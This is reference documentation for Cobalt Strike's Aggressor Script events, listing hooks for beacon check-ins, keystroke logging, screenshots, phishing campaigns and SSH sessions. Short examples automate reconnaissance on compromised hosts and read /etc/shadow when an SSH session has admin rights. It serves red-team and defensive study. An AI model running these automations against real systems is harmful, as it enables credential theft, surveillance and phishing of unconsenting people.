Events
These are the events fired by Aggressor Script.
*
This event fires whenever any Aggressor Script event fires.
Arguments
$1 - the original event name
... - the arguments to the event
Example
# event spy script
on * {
println("[ $+ $1 $+ ]: " . subarray(@_, 1));
}
beacon_checkin
Fired when a Beacon checkin acknowledgement is posted to a Beacon's console.
Arguments
$1 - the ID of the beacon
$2 - the text of the message
$3 - when this message occurred
beacon_error
Fired when an error is posted to a Beacon's console.
Arguments
$1 - the ID of the beacon
$2 - the text of the message
$3 - when this message occurred
beacon_indicator
Fired when an indicator of compromise notice is posted to a Beacon's console.
Arguments
$1 - the ID of the beacon
$2 - the user responsible for the input
$3 - the text of the message
$4 - when this message occurred
beacon_initial
Fired when a Beacon calls home for the first time.
Arguments
$1 - the ID of the beacon that called home.
Example
on beacon_initial {
# list network connections
bshell($1, "netstat -na | findstr \"ESTABLISHED\"");
# list shares
bshell($1, "net use");
# list groups
bshell($1, "whoami /groups");
}
beacon_initial_empty
Fired when a DNS Beacon calls home for the first time. At this point, no metadata has been exchanged.
Arguments
$1 - the ID of the beacon that called home.
Example
on beacon_initial_empty {
binput($1, "[Acting on new DNS Beacon]");
# change the data channel to DNS TXT
bmode($1, "dns-txt");
# request the Beacon checkin and send its metadata
bcheckin($1);
}
beacon_input
Fired when an input message is posted to a Beacon's console.
Arguments
$1 - the ID of the beacon
$2 - the user responsible for the input
$3 - the text of the message
$4 - when this message occurred
beacon_mode
Fired when a mode change acknowledgement is posted to a Beacon's console.
Arguments
$1 - the ID of the beacon
$2 - the text of the message
$3 - when this message occurred
beacon_output
Fired when output is posted to a Beacon's console.
Arguments
$1 - the ID of the beacon
$2 - the text of the message
$3 - when this message occurred
beacon_output_alt
Fired when (alternate) output is posted to a Beacon's console. What makes for alternate output? It's just different presentation from normal output.
Arguments
$1 - the ID of the beacon
$2 - the text of the message
$3 - when this message occurred
beacon_output_jobs
Fired when jobs output is sent to a Beacon's console.
Arguments
$1 - the ID of the beacon
$2 - the text of the jobs output
$3 - when this message occurred
beacon_output_ls
Fired when ls output is sent to a Beacon's console.
Arguments
$1 - the ID of the beacon
$2 - the text of the ls output
$3 - when this message occurred
beacon_output_ps
Fired when ps output is sent to a Beacon's console.
Arguments
$1 - the ID of the beacon
$2 - the text of the ps output
$3 - when this message occurred
beacon_tasked
Fired when a task acknowledgement is posted to a Beacon's console.
Arguments
$1 - the ID of the beacon
$2 - the text of the message
$3 - when this message occurred
beacons
Fired when the team server sends over fresh information on all of our Beacons. This occurs about once each second.
Arguments
$1 - an array of dictionary objects with metadata for each Beacon.
custom_event_<event name>
Fired when a client receives a custom event from another client.
Arguments
$1 - who sent the custom event
$2 - the event data
$3 - the time the event was sent
Example
# subscribe to the my-topic custom event
on "custom_event_my-topic" {
println("Received my-topic:")
println("\tSender: $1");
println("\tData: $2");
println("\tTimestamp: $3");
}
disconnect
Fired when this Cobalt Strike becomes disconnected from the team server.
event_action
Fired when a user performs an action in the event log. This is similar to an action on IRC (the /me command)
Arguments
$1 - who the message is from
$2 - the contents of the message
$3 - the time the message was posted
event_beacon_initial
Fired when an initial beacon message is posted to the event log.
Arguments
$1 - the contents of the message
$2 - the time the message was posted
event_join
Fired when a user connects to the team server
Arguments
$1 - who joined the team server
$2 - the time the message was posted
event_newsite
Fired when a new site message is posted to the event log.
Arguments
$1 - who setup the new site
$2 - the contents of the new site message
$3 - the time the message was posted
event_notify
Fired when a message from the team server is posted to the event log.
Arguments
$1 - the contents of the message
$2 - the time the message was posted
event_nouser
Fired when the current Cobalt Strike client tries to interact with a user who is not connected to the team server.
Arguments
$1 - who is not present
$2 - the time the message was posted
event_private
Fired when a private message is posted to the event log.
Arguments
$1 - who the message is from
$2 - who the message is directed to
$3 - the contents of the message
$4 - the time the message was posted
event_public
Fired when a public message is posted to the event log.
Arguments
$1 - who the message is from
$2 - the contents of the message
$3 - the time the message was posted
event_quit
Fired when someone disconnects from the team server.
Arguments
$1 - who left the team server
$2 - the time the message was posted
heartbeat_10m
Fired every ten minutes
heartbeat_10s
Fired every ten seconds
heartbeat_15m
Fired every fifteen minutes
heartbeat_15s
Fired every fifteen seconds
heartbeat_1m
Fired every minute
heartbeat_1s
Fired every second
heartbeat_20m
Fired every twenty minutes
heartbeat_30m
Fired every thirty minutes
heartbeat_30s
Fired every thirty seconds
heartbeat_5m
Fired every five minutes
heartbeat_5s
Fired every five seconds
heartbeat_60m
Fired every sixty minutes
keylogger_hit
Fired when there are new results reported to the web server via the cloned site keystroke logger.
Arguments
$1 - external address of visitor
$2 - reserved
$3 - the logged keystrokes
$4 - the phishing token for these recorded keystrokes.
keystrokes
Fired when Cobalt Strike receives keystrokes
Arguments
$1 - a dictionary with information about the keystrokes.
| Key | Value |
|---|---|
| bid | Beacon ID for session keystrokes originated from |
| data | keystroke data reported in this batch |
| id | identifier for this keystroke buffer |
| session | desktop session from keystroke logger |
| title | last active window title from keystroke logger |
| user | username from keystroke logger |
| when | timestamp of when these results were generated |
Example
on keystrokes {
if ("*Admin*" iswm $1["title"]) {
blog($1["bid"], "Interesting keystrokes received.
Go to \c4View -> Keystrokes\o and look for the green buffer.");
highlight("keystrokes", @($1), "good");
}
}
profiler_hit
Fired when there are new results reported to the System Profiler.
Arguments
$1 - external address of visitor
$2 - de-cloaked internal address of visitor (or "unknown")
$3 - visitor's User-Agent
$4 - a dictionary containing the applications.
$5 - the phishing token of the visitor (use &tokenToEmail to resolve to an email address)
ready
Fired when this Cobalt Strike client is connected to the team server and ready to act.
screenshots
Fired when Cobalt Strike receives a screenshot.
Arguments
$1 - a dictionary with information about the screenshot.
| Key | Value |
|---|---|
| bid | Beacon ID for session screenshot originated from |
| data | raw screenshot data (this is a .jpg file) |
| id | identifier for this screenshot |
| session | desktop session reported by screenshot tool |
| title | active window title from screenshot tool |
| user | username from screenshot tool |
| when | timestamp of when this screenshot was received |
Example
# watch for any screenshots where someone is banking and
# redact it from the user-interface.
on screenshots {
local('$title');
$title = lc($1["title"]);
if ("*bankofamerica*" iswm $title) {
redactobject($1["id"]);
}
else if ("jpmc*" iswm $title) {
redactobject($1["id"]);
}
}
sendmail_done
Fired when a phishing campaign completes
Arguments
$1 - the campaign ID
sendmail_post
Fired after a phish is sent to an email address.
Arguments
$1 - the campaign ID
$2 - the email we're sending a phish to
$3 - the status of the phish (e.g., SUCCESS)
$4 - the message from the mail server
sendmail_pre
Fired before a phish is sent to an email address.
Arguments
$1 - the campaign ID
$2 - the email we're sending a phish to
sendmail_start
Fired when a new phishing campaign kicks off.
Arguments
$1 - the campaign ID
$2 - number of targets
$3 - local path to attachment
$4 - the bounce to address
$5 - the mail server string
$6 - the subject of the phishing email
$7 - the local path to the phishing template
$8 - the URL to embed into the phish
ssh_checkin
Fired when an SSH client checkin acknowledgement is posted to an SSH console.
Arguments
$1 - the ID of the session
$2 - the text of the message
$3 - when this message occurred
ssh_error
Fired when an error is posted to an SSH console.
Arguments
$1 - the ID of the session
$2 - the text of the message
$3 - when this message occurred
ssh_indicator
Fired when an indicator of compromise notice is posted to an SSH console.
Arguments
$1 - the ID of the session
$2 - the user responsible for the input
$3 - the text of the message
$4 - when this message occurred
ssh_initial
Fired when an SSH session is seen for the first time.
Arguments
$1 - the ID of the session
Example
on ssh_initial {
if (-isadmin $1) {
bshell($1, "cat /etc/shadow");
}
}
ssh_input
Fired when an input message is posted to an SSH console.
Arguments
$1 - the ID of the session
$2 - the user responsible for the input
$3 - the text of the message
$4 - when this message occurred
ssh_output
Fired when output is posted to an SSH console.
Arguments
$1 - the ID of the session
$2 - the text of the message
$3 - when this message occurred
ssh_output_alt
Fired when (alternate) output is posted to an SSH console. What makes for alternate output? It's just different presentation from normal output.
Arguments
$1 - the ID of the session
$2 - the text of the message
$3 - when this message occurred
ssh_tasked
Fired when a task acknowledgement is posted to an SSH console.
Arguments
$1 - the ID of the session
$2 - the text of the message
$3 - when this message occurred
web_hit
Fired when there's a new hit on Cobalt Strike's web server.
Arguments
$1 - the method (e.g., GET, POST)
$2 - the requested URI
$3 - the visitor's address
$4 - the visitor's User-Agent string
$5 - the web server's response to the hit (e.g., 200)
$6 - the size of the web server's response
$7 - a description of the handler that processed this hit.
$8 - a dictionary containing the parameters sent to the web server
$9 - the time when the hit took place.